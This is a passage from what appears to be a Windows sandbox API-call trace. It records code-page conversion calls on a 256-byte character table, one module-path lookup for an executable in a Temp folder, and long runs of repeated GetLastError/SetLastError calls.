ae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef
\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xe3\x30\xb1\xa9\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0108.148] GetLastError () returned 0x6 [0108.148] SetLastError (dwErrCode=0x6) [0108.148] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0108.148] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ꧄ശAĀ") returned 256 [0108.148] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ꧄ശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0108.148] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ꧄ശAĀ", cchSrc=256, lpDestStr=0x12f4a8, cchDest=256 | out: lpDestStr=" 
\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0108.149] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x12fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x0
5\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf
9\xfa\xfb\xfc\xfd\xfe\xff\xe3\x30\xb1\xa9\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0108.149] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x421940, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\f8a3iwa6.exe")) returned 0x30 [0108.149] GetLastError () returned 0x0 [0108.149] SetLastError (dwErrCode=0x0) [0108.149] GetLastError () returned 0x0 [0108.149] SetLastError (dwErrCode=0x0) [0108.149] GetLastError () returned 0x0 [0108.149] SetLastError (dwErrCode=0x0) [0108.149] GetLastError () returned 0x0 [0108.149] SetLastError (dwErrCode=0x0) [0108.149] GetLastError () returned 0x0 [0108.149] SetLastError (dwErrCode=0x0) [0108.149] GetLastError () returned 0x0 [0108.149] SetLastError (dwErrCode=0x0) [0108.149] GetLastError () returned 0x0 [0108.149] SetLastError (dwErrCode=0x0) [0108.149] GetLastError () returned 0x0 [0108.149] SetLastError (dwErrCode=0x0) [0108.149] GetLastError () returned 0x0 [0108.149] SetLastError (dwErrCode=0x0) [0108.149] GetLastError () returned 0x0 [0108.149] SetLastError (dwErrCode=0x0) [0108.149] GetLastError () returned 0x0 [0108.149] SetLastError (dwErrCode=0x0) [0108.149] GetLastError () returned 0x0 [0108.149] SetLastError (dwErrCode=0x0) [0108.149] GetLastError () returned 0x0 [0108.149] SetLastError (dwErrCode=0x0) [0108.150] GetLastError () returned 0x0 [0108.150] SetLastError (dwErrCode=0x0) [0108.150] GetLastError () returned 0x0 [0108.150] SetLastError (dwErrCode=0x0) [0108.150] GetLastError () returned 0x0 [0108.150] SetLastError (dwErrCode=0x0) [0108.150] GetLastError () returned 0x0 [0108.150] SetLastError (dwErrCode=0x0) [0108.150] GetLastError () returned 0x0 [0108.150] SetLastError (dwErrCode=0x0) [0108.150] GetLastError () returned 0x0 [0108.150] SetLastError (dwErrCode=0x0) [0108.150] GetLastError () returned 0x0 [0108.150] SetLastError (dwErrCode=0x0) [0108.150] GetLastError () returned 0x0 [0108.150] SetLastError 
(dwErrCode=0x0) [0108.150] GetLastError () returned 0x0 [0108.150] SetLastError (dwErrCode=0x0) [0108.150] GetLastError () returned 0x0 [0108.150] SetLastError (dwErrCode=0x0) [0108.150] GetLastError () returned 0x0 [0108.150] SetLastError (dwErrCode=0x0) [0108.150] GetLastError () returned 0x0 [0108.150] SetLastError (dwErrCode=0x0) [0108.150] GetLastError () returned 0x0 [0108.150] SetLastError (dwErrCode=0x0) [0108.150] GetLastError () returned 0x0 [0108.150] SetLastError (dwErrCode=0x0) [0108.150] GetLastError () returned 0x0 [0108.151] SetLastError (dwErrCode=0x0) [0108.151] GetLastError () returned 0x0 [0108.151] SetLastError (dwErrCode=0x0) [0108.151] GetLastError () returned 0x0 [0108.151] SetLastError (dwErrCode=0x0) [0108.151] GetLastError () returned 0x0 [0108.151] SetLastError (dwErrCode=0x0) [0108.151] GetLastError () returned 0x0 [0108.151] SetLastError (dwErrCode=0x0) [0108.151] GetLastError () returned 0x0 [0108.151] SetLastError (dwErrCode=0x0) [0108.151] GetLastError () returned 0x0 [0108.151] SetLastError (dwErrCode=0x0) [0108.151] GetLastError () returned 0x0 [0108.151] SetLastError (dwErrCode=0x0) [0108.151] GetLastError () returned 0x0 [0108.151] SetLastError (dwErrCode=0x0) [0108.151] GetLastError () returned 0x0 [0108.151] SetLastError (dwErrCode=0x0) [0108.151] GetLastError () returned 0x0 [0108.151] SetLastError (dwErrCode=0x0) [0108.151] GetLastError () returned 0x0 [0108.151] SetLastError (dwErrCode=0x0) [0108.151] GetLastError () returned 0x0 [0108.151] SetLastError (dwErrCode=0x0) [0108.151] GetLastError () returned 0x0 [0108.151] SetLastError (dwErrCode=0x0) [0108.151] GetLastError () returned 0x0 [0108.151] SetLastError (dwErrCode=0x0) [0108.151] GetLastError () returned 0x0 [0108.152] SetLastError (dwErrCode=0x0) [0108.152] GetLastError () returned 0x0 [0108.152] SetLastError (dwErrCode=0x0) [0108.152] GetLastError () returned 0x0 [0108.152] SetLastError (dwErrCode=0x0) [0108.152] GetLastError () returned 0x0 [0108.152] SetLastError 
(dwErrCode=0x0) [0108.152] GetLastError () returned 0x0 [0108.152] SetLastError (dwErrCode=0x0) [0108.152] GetLastError () returned 0x0 [0108.152] SetLastError (dwErrCode=0x0) [0108.152] GetLastError () returned 0x0 [0108.152] SetLastError (dwErrCode=0x0) [0108.152] GetLastError () returned 0x0 [0108.152] SetLastError (dwErrCode=0x0) [0108.152] GetLastError () returned 0x0 [0108.152] SetLastError (dwErrCode=0x0) [0108.152] GetLastError () returned 0x0 [0108.152] SetLastError (dwErrCode=0x0) [0108.152] GetLastError () returned 0x0 [0108.152] SetLastError (dwErrCode=0x0) [0108.152] GetLastError () returned 0x0 [0108.152] SetLastError (dwErrCode=0x0) [0108.152] GetLastError () returned 0x0 [0108.152] SetLastError (dwErrCode=0x0) [0108.152] GetLastError () returned 0x0 [0108.152] SetLastError (dwErrCode=0x0) [0108.152] GetLastError () returned 0x0 [0108.152] SetLastError (dwErrCode=0x0) [0108.152] GetLastError () returned 0x0 [0108.153] SetLastError (dwErrCode=0x0) [0108.153] GetLastError () returned 0x0 [0108.153] SetLastError (dwErrCode=0x0) [0108.153] GetLastError () returned 0x0 [0108.153] SetLastError (dwErrCode=0x0) [0108.153] GetLastError () returned 0x0 [0108.153] SetLastError (dwErrCode=0x0) [0108.153] GetLastError () returned 0x0 [0108.153] SetLastError (dwErrCode=0x0) [0108.153] GetLastError () returned 0x0 [0108.153] SetLastError (dwErrCode=0x0) [0108.153] GetLastError () returned 0x0 [0108.153] SetLastError (dwErrCode=0x0) [0108.153] GetLastError () returned 0x0 [0108.153] SetLastError (dwErrCode=0x0) [0108.153] GetLastError () returned 0x0 [0108.153] SetLastError (dwErrCode=0x0) [0108.153] GetLastError () returned 0x0 [0108.153] SetLastError (dwErrCode=0x0) [0108.153] GetLastError () returned 0x0 [0108.153] SetLastError (dwErrCode=0x0) [0108.153] GetLastError () returned 0x0 [0108.153] SetLastError (dwErrCode=0x0) [0108.153] GetLastError () returned 0x0 [0108.153] SetLastError (dwErrCode=0x0) [0108.153] GetLastError () returned 0x0 [0108.153] SetLastError 
(dwErrCode=0x0) [0108.153] GetLastError () returned 0x0 [0108.153] SetLastError (dwErrCode=0x0) [0108.153] GetLastError () returned 0x0 [0108.153] SetLastError (dwErrCode=0x0) [0108.153] GetLastError () returned 0x0 [0108.154] SetLastError (dwErrCode=0x0) [0108.154] GetLastError () returned 0x0 [0108.154] SetLastError (dwErrCode=0x0) [0108.154] GetLastError () returned 0x0 [0108.154] SetLastError (dwErrCode=0x0) [0108.154] GetLastError () returned 0x0 [0108.154] SetLastError (dwErrCode=0x0) [0108.154] GetLastError () returned 0x0 [0108.154] SetLastError (dwErrCode=0x0) [0108.154] GetLastError () returned 0x0 [0108.154] SetLastError (dwErrCode=0x0) [0108.154] GetLastError () returned 0x0 [0108.154] SetLastError (dwErrCode=0x0) [0108.154] GetLastError () returned 0x0 [0108.154] SetLastError (dwErrCode=0x0) [0108.154] GetLastError () returned 0x0 [0108.154] SetLastError (dwErrCode=0x0) [0108.154] GetLastError () returned 0x0 [0108.154] SetLastError (dwErrCode=0x0) [0108.154] GetLastError () returned 0x0 [0108.154] SetLastError (dwErrCode=0x0) [0108.154] GetLastError () returned 0x0 [0108.154] SetLastError (dwErrCode=0x0) [0108.154] GetLastError () returned 0x0 [0108.154] SetLastError (dwErrCode=0x0) [0108.154] GetLastError () returned 0x0 [0108.154] SetLastError (dwErrCode=0x0) [0108.154] GetLastError () returned 0x0 [0108.154] SetLastError (dwErrCode=0x0) [0108.154] GetLastError () returned 0x0 [0108.154] SetLastError (dwErrCode=0x0) [0108.155] GetLastError () returned 0x0 [0108.155] SetLastError (dwErrCode=0x0) [0108.155] GetLastError () returned 0x0 [0108.155] SetLastError (dwErrCode=0x0) [0108.155] GetLastError () returned 0x0 [0108.155] SetLastError (dwErrCode=0x0) [0108.155] GetLastError () returned 0x0 [0108.155] SetLastError (dwErrCode=0x0) [0108.155] GetLastError () returned 0x0 [0108.155] SetLastError (dwErrCode=0x0) [0108.155] GetLastError () returned 0x0 [0108.155] SetLastError (dwErrCode=0x0) [0108.155] GetLastError () returned 0x0 [0108.155] SetLastError 
(dwErrCode=0x0) [0108.155] GetLastError () returned 0x0 [0108.155] SetLastError (dwErrCode=0x0) [0108.155] GetLastError () returned 0x0 [0108.155] SetLastError (dwErrCode=0x0) [0108.155] GetLastError () returned 0x0 [0108.155] SetLastError (dwErrCode=0x0) [0108.155] GetLastError () returned 0x0 [0108.155] SetLastError (dwErrCode=0x0) [0108.155] GetLastError () returned 0x0 [0108.155] SetLastError (dwErrCode=0x0) [0108.155] GetLastError () returned 0x0 [0108.155] SetLastError (dwErrCode=0x0) [0108.155] GetLastError () returned 0x0 [0108.155] SetLastError (dwErrCode=0x0) [0108.155] GetLastError () returned 0x0 [0108.155] SetLastError (dwErrCode=0x0) [0108.155] GetLastError () returned 0x0 [0108.156] SetLastError (dwErrCode=0x0) [0108.156] GetLastError () returned 0x0 [0108.156] SetLastError (dwErrCode=0x0) [0108.156] GetLastError () returned 0x0 [0108.156] SetLastError (dwErrCode=0x0) [0108.156] GetLastError () returned 0x0 [0108.156] SetLastError (dwErrCode=0x0) [0108.156] GetLastError () returned 0x0 [0108.156] SetLastError (dwErrCode=0x0) [0108.156] GetLastError () returned 0x0 [0108.156] SetLastError (dwErrCode=0x0) [0108.156] GetLastError () returned 0x0 [0108.156] SetLastError (dwErrCode=0x0) [0108.156] GetLastError () returned 0x0 [0108.156] SetLastError (dwErrCode=0x0) [0108.156] GetLastError () returned 0x0 [0108.156] SetLastError (dwErrCode=0x0) [0108.156] GetLastError () returned 0x0 [0108.156] SetLastError (dwErrCode=0x0) [0108.156] GetLastError () returned 0x0 [0108.156] SetLastError (dwErrCode=0x0) [0108.156] GetLastError () returned 0x0 [0108.156] SetLastError (dwErrCode=0x0) [0108.156] GetLastError () returned 0x0 [0108.156] SetLastError (dwErrCode=0x0) [0108.156] GetLastError () returned 0x0 [0108.156] SetLastError (dwErrCode=0x0) [0108.156] GetLastError () returned 0x0 [0108.156] SetLastError (dwErrCode=0x0) [0108.156] GetLastError () returned 0x0 [0108.156] SetLastError (dwErrCode=0x0) [0108.156] GetLastError () returned 0x0 [0108.157] SetLastError 
(dwErrCode=0x0) [0108.157] GetLastError () returned 0x0 [0108.157] SetLastError (dwErrCode=0x0) [0108.157] GetLastError () returned 0x0 [0108.157] SetLastError (dwErrCode=0x0) [0108.157] GetLastError () returned 0x0 [0108.157] SetLastError (dwErrCode=0x0) [0108.157] GetLastError () returned 0x0 [0108.157] SetLastError (dwErrCode=0x0) [0108.157] GetLastError () returned 0x0 [0108.157] SetLastError (dwErrCode=0x0) [0108.157] GetLastError () returned 0x0 [0108.157] SetLastError (dwErrCode=0x0) [0108.157] GetLastError () returned 0x0 [0108.157] SetLastError (dwErrCode=0x0) [0108.157] GetLastError () returned 0x0 [0108.157] SetLastError (dwErrCode=0x0) [0108.157] GetLastError () returned 0x0 [0108.157] SetLastError (dwErrCode=0x0) [0108.157] GetLastError () returned 0x0 [0108.157] SetLastError (dwErrCode=0x0) [0108.157] GetLastError () returned 0x0 [0108.157] SetLastError (dwErrCode=0x0) [0108.157] GetLastError () returned 0x0 [0108.157] SetLastError (dwErrCode=0x0) [0108.157] GetLastError () returned 0x0 [0108.157] SetLastError (dwErrCode=0x0) [0108.157] GetLastError () returned 0x0 [0108.157] SetLastError (dwErrCode=0x0) [0108.157] GetLastError () returned 0x0 [0108.157] SetLastError (dwErrCode=0x0) [0108.157] GetLastError () returned 0x0 [0108.158] SetLastError (dwErrCode=0x0) [0108.158] GetLastError () returned 0x0 [0108.158] SetLastError (dwErrCode=0x0) [0108.158] GetLastError () returned 0x0 [0108.158] SetLastError (dwErrCode=0x0) [0108.158] GetLastError () returned 0x0 [0108.158] SetLastError (dwErrCode=0x0) [0108.158] GetLastError () returned 0x0 [0108.158] SetLastError (dwErrCode=0x0) [0108.158] GetLastError () returned 0x0 [0108.158] SetLastError (dwErrCode=0x0) [0108.158] GetLastError () returned 0x0 [0108.158] SetLastError (dwErrCode=0x0) [0108.158] GetLastError () returned 0x0 [0108.158] SetLastError (dwErrCode=0x0) [0108.158] GetLastError () returned 0x0 [0108.158] SetLastError (dwErrCode=0x0) [0108.158] GetLastError () returned 0x0 [0108.158] SetLastError 
(dwErrCode=0x0) [0108.158] GetLastError () returned 0x0 [0108.158] SetLastError (dwErrCode=0x0) [0108.158] GetLastError () returned 0x0 [0108.158] SetLastError (dwErrCode=0x0) [0108.158] GetLastError () returned 0x0 [0108.158] SetLastError (dwErrCode=0x0) [0108.158] GetLastError () returned 0x0 [0108.158] SetLastError (dwErrCode=0x0) [0108.158] GetLastError () returned 0x0 [0108.158] SetLastError (dwErrCode=0x0) [0108.158] GetLastError () returned 0x0 [0108.159] SetLastError (dwErrCode=0x0) [0108.159] GetLastError () returned 0x0 [0108.159] SetLastError (dwErrCode=0x0) [0108.159] GetLastError () returned 0x0 [0108.159] SetLastError (dwErrCode=0x0) [0108.159] GetLastError () returned 0x0 [0108.159] SetLastError (dwErrCode=0x0) [0108.159] GetLastError () returned 0x0 [0108.159] SetLastError (dwErrCode=0x0) [0108.159] GetLastError () returned 0x0 [0108.159] SetLastError (dwErrCode=0x0) [0108.159] GetLastError () returned 0x0 [0108.159] SetLastError (dwErrCode=0x0) [0108.159] GetLastError () returned 0x0 [0108.159] SetLastError (dwErrCode=0x0) [0108.159] GetLastError () returned 0x0 [0108.159] SetLastError (dwErrCode=0x0) [0108.159] GetLastError () returned 0x0 [0108.159] SetLastError (dwErrCode=0x0) [0108.159] GetLastError () returned 0x0 [0108.159] SetLastError (dwErrCode=0x0) [0108.159] GetLastError () returned 0x0 [0108.159] SetLastError (dwErrCode=0x0) [0108.159] GetLastError () returned 0x0 [0108.159] SetLastError (dwErrCode=0x0) [0108.159] GetLastError () returned 0x0 [0108.159] SetLastError (dwErrCode=0x0) [0108.159] GetLastError () returned 0x0 [0108.159] SetLastError (dwErrCode=0x0) [0108.159] GetLastError () returned 0x0 [0108.159] SetLastError (dwErrCode=0x0) [0108.159] GetLastError () returned 0x0 [0108.160] SetLastError (dwErrCode=0x0) [0108.160] GetLastError () returned 0x0 [0108.160] SetLastError (dwErrCode=0x0) [0108.160] GetLastError () returned 0x0 [0108.160] SetLastError (dwErrCode=0x0) [0108.160] GetLastError () returned 0x0 [0108.160] SetLastError 
(dwErrCode=0x0) [0108.160] GetLastError () returned 0x0 [0108.160] SetLastError (dwErrCode=0x0) [0108.160] GetLastError () returned 0x0 [0108.160] SetLastError (dwErrCode=0x0) [0108.160] GetLastError () returned 0x0 [0108.160] SetLastError (dwErrCode=0x0) [0108.160] GetLastError () returned 0x0 [0108.160] SetLastError (dwErrCode=0x0) [0108.160] GetLastError () returned 0x0 [0108.160] SetLastError (dwErrCode=0x0) [0108.160] GetLastError () returned 0x0 [0108.160] SetLastError (dwErrCode=0x0) [0108.160] GetLastError () returned 0x0 [0108.160] SetLastError (dwErrCode=0x0) [0108.160] GetLastError () returned 0x0 [0108.160] SetLastError (dwErrCode=0x0) [0108.160] GetLastError () returned 0x0 [0108.160] SetLastError (dwErrCode=0x0) [0108.160] GetLastError () returned 0x0 [0108.160] SetLastError (dwErrCode=0x0) [0108.160] GetLastError () returned 0x0 [0108.161] SetLastError (dwErrCode=0x0) [0108.161] GetLastError () returned 0x0 [0108.161] SetLastError (dwErrCode=0x0) [0108.161] GetLastError () returned 0x0 [0108.161] SetLastError (dwErrCode=0x0) [0108.161] GetLastError () returned 0x0 [0108.161] SetLastError (dwErrCode=0x0) [0108.161] GetLastError () returned 0x0 [0108.161] SetLastError (dwErrCode=0x0) [0108.161] GetLastError () returned 0x0 [0108.161] SetLastError (dwErrCode=0x0) [0108.161] GetLastError () returned 0x0 [0108.161] SetLastError (dwErrCode=0x0) [0108.161] GetLastError () returned 0x0 [0108.161] SetLastError (dwErrCode=0x0) [0108.161] GetLastError () returned 0x0 [0108.161] SetLastError (dwErrCode=0x0) [0108.161] GetLastError () returned 0x0 [0108.161] SetLastError (dwErrCode=0x0) [0108.161] GetLastError () returned 0x0 [0108.161] SetLastError (dwErrCode=0x0) [0108.161] GetLastError () returned 0x0 [0108.161] SetLastError 